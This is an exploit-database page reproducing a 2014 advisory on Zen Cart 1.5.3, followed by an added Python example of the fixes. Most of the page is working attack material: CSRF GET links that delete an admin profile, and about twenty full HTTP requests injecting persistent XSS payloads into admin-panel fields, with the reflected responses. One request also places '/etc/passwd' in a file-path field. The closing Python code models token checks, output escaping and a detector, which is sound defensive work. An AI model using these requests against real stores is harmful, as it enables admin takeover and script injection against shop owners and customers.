0day.today - Biggest Exploit Database in the World.
Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Date: 09.07.14
#Vendor: zen-cart.com
#Tested on: Apache 2.2 [at] Linux
#Contact: smash[at]devilteam.pl

#1 - CSRF

- Delete admin
The profile GET parameter is the user id.
localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2

- Reset layout boxes to default
localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults

#2 - Persistent XSS in admin panel

Since admin privileges are required to trigger the following vulnerabilities, this is not a serious threat.

- Extras -> Media types -> Add
Vulnerable parameters - type_name & type_ext

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
Content-Length: 663

-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_name"

<h1>sup<!--
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_ext"

sup<>
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="x"

19
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="y"

13
-----------------------------4978676881674017321390852339--

Response:
(...)
<td class="dataTableContent"><h1>sup<!--</td>
<td class="dataTableContent">sup<></td>
<td class="dataTableContent" align="right">
(...)
- Extras -> Media manager -> Add
Vulnerable parameter - media_name

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
Content-Length: 5633

-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_name"

<script>alert(666)</script>
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="x"

32
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="y"

16
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
Content-Type: image/png

(image)
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_dir"

-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_type"

2
-----------------------------1835318161847256146721022401--

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
</tr>

- Extras -> Music genre -> Add
Vulnerable parameter - music_genre_name

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
Content-Length: 581

-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="music_genre_name"

<script>alert(666)</script>
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="x"

37
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="y"

10
-----------------------------202746648818048680751007920584--

Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)

Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1

Response:
(...)
<div id="navBreadCrumb">
<a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
(...)
- Extras -> Record companies -> Add

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
Content-Length: 5828

-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_name"

<script>alert(666)</script>
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
Content-Type: image/png

-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="img_dir"

categories/
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image_manual"

/etc/passwd
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_url[1]"

'>"><>XSS
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="x"

21
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="y"

13
-----------------------------19884630671863875697751588711--

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)

Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1

Response:
(...)
<div id="navBreadCrumb">
<a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
<div class="centerColumn" id="indexProductList">
<h1 id="productListHeading"><script>alert(666)</script></h1>
(...)

- Extras -> Recording Artists -> Add
Vulnerable parameter - artists_name

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
Content-Length: 1099

-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="securityToken"

84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_name"

<script>alert(666)</script>
-----------------------------14015448418946681711346093460
(Content-Disposition: form-data; name="artists_image"; filename=""
Content-Type: application/octet-stream

-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="img_dir"

-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_image_manual"

-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_url[1]"

-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="x"

39
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="y"

19
-----------------------------14015448418946681711346093460--)

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)
- Gift Certificate/Coupons -> Coupon admin -> Add
Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: localhost

securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10

Response:
(...)
<tr>
<td align="left">Coupon Name</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Coupon Description <br />(Customer can see)</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Coupon Amount</td>
<td align="left"></td>
</tr>
<tr>
<td align="left">Coupon Minimum Order</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Free Shipping</td>
<td align="left">Free Shipping</td>
</tr>
<tr>
<td align="left">Coupon Code</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Uses per Coupon</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Uses per Customer</td>
<td align="left">'>"><>XSSD</td>
</tr>
(...)

- Gift Certificate/Coupons -> Mail gift certificate -> Send
Vulnerable parameter - email_to

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
Host: localhost

securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12

Response:
(...)
</tr>
<tr>
<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
</tr>
<tr>
(...)

- Tools -> Banner manager -> Add

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
Content-Length: 2317

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="securityToken"

84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="status"

1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_open_new_windows"

0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_on_ssl"

1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_title"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_url"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_group"

BannersAll
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="new_banners_group"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image"; filename=""
Content-Type: application/octet-stream

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_local"

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_target"

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_html_text"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_sort_order"

15
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="date_scheduled"

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_date"

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_impressions"

0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="x"

9
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="y"

7
-----------------------------3847719184268426731396009422--

Response:
(...)
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">'>"><>XSS</td>
<td class="dataTableContent" align="right">0 / 0</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)

- Tools -> Newsletter and Product Notifications Manager -> New newsletter

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
Host: localhost

securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8

Response:
(...)
<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">18 bytes</td>
(...)
<table border="0" width="100%" cellspacing="0" cellpadding="2">
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
- Tools -> EZ-Pages -> New file

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
Content-Length: 2253

-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="securityToken"

c74a83cefbb5ffc1868dd4a390bd0880
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="x"

41
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="y"

17
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_title"

'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="page_open_new_window"

0
-----------------------------134785397313015614741294511591
(...)
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_html_text"

'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url"

-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url_external"

-----------------------------134785397313015614741294511591--

Response:
(...)
<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
<td class="dataTableContent">&nbps;'>"><>XSS</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
</tr>
(...)
- Localization -> Currencies -> New currency

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Title: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Code: '>"</td>
</tr>
<tr>
<td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
</tr>
</table>
(...)
<tr>
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
</tr>

- Localization -> Languages -> New language
Affects a big part of the admin panel.

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20

Response:
(...)
<td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
</tr>
</table>
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">xs</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Name: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Code: xs</td>
</tr>
<tr>
<td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
</tr>
<tr>
<td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
</tr>
(...)

Further injection:
http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php

- Localization -> Orders status -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7

Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
(...)

- Locations / Taxes -> Zones -> New zone

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="center">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
</table>
(...)
<tr>
<td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
</tr>
<tr>
<td class="infoBoxContent"><br>Country: '>"><>XSS</td>

- Locations / Taxes -> Zone definitions -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13

Response:
(...)
</a>&nbps;'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>

- Locations / Taxes -> Tax Classes -> New tax class

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)

- Locations / Taxes -> Tax Rates -> New tax rate

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">66%</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)
- Customers -> Group Pricing -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9

Response:
(...)
<td class="dataTableContent">1</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">0.00</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)

# 0day.today [2024-11-15] #
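Added example, not from the advisory or from Zen Cart: a small Python model of the two defect classes listed above, #1 (a profile delete reached by a GET that carries no securityToken) and #2 (admin-supplied names echoed raw into dataTableContent cells), each beside its hardened form, plus a regression check that flags submitted values reappearing unencoded in a response. SESSIONS, delete_allowed, render_cell, unescaped_reflections and media_types_sample are hypothetical names; the session store, the sample fields and the response fragments are constructed from the media types request above.

```python
import hmac
import html
import re
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed session store {session_id: securityToken}; hypothetical, not Zen Cart's.
SESSIONS = {"sess-1": secrets.token_hex(16)}


def delete_allowed(method, url, form, session_id):
    """#1 hardened: a profile delete is honoured only on POST and only when the
    form carries the session's securityToken. The advisory's link
    (GET profiles.php?action=delete&profile=2) has neither, so it is refused;
    a forged cross-site form that lacks the token is refused too."""
    query = parse_qs(urlsplit(url).query)
    if query.get("action") != ["delete"] or "profile" not in query:
        return False
    if method != "POST":          # a link, image tag or redirect can issue a GET
        return False
    expected = SESSIONS.get(session_id)
    given = form.get("securityToken", "")
    return expected is not None and hmac.compare_digest(given, expected)


def render_cell(value, escape=True):
    """#2: the dataTableContent cell seen in the responses above.
    escape=False reproduces the vulnerable output; escape=True is the fix
    (entity-encode <, >, &, and quotes before the value reaches the page)."""
    shown = html.escape(value, quote=True) if escape else value
    return '<td class="dataTableContent">%s</td>' % shown


RISKY = re.compile(r'[<>"\'&]')


def unescaped_reflections(fields, response_html):
    """Regression check for a fixed form: names of submitted fields whose value
    contains markup-significant characters and reappears verbatim in the
    response. An empty list means every such value was encoded."""
    return [name for name, value in fields.items()
            if RISKY.search(value) and value in response_html]


def media_types_sample():
    """Constructed from the media_types.php request above: the inputs,
    the raw rendering the advisory shows, and the encoded rendering."""
    fields = {"type_name": "<h1>sup<!--", "type_ext": "sup<>", "x": "19"}
    vulnerable = "\n".join(render_cell(v, escape=False) for v in fields.values())
    hardened = "\n".join(render_cell(v) for v in fields.values())
    return (unescaped_reflections(fields, vulnerable),
            unescaped_reflections(fields, hardened))


if __name__ == "__main__":
    link = "/admin123/profiles.php?action=delete&profile=2"
    print("GET delete link allowed:", delete_allowed("GET", link, {}, "sess-1"))
    print("POST with token allowed:", delete_allowed(
        "POST", link, {"securityToken": SESSIONS["sess-1"]}, "sess-1"))
    raw, fixed = media_types_sample()
    print("raw rendering leaks:", raw, "| encoded rendering leaks:", fixed)
```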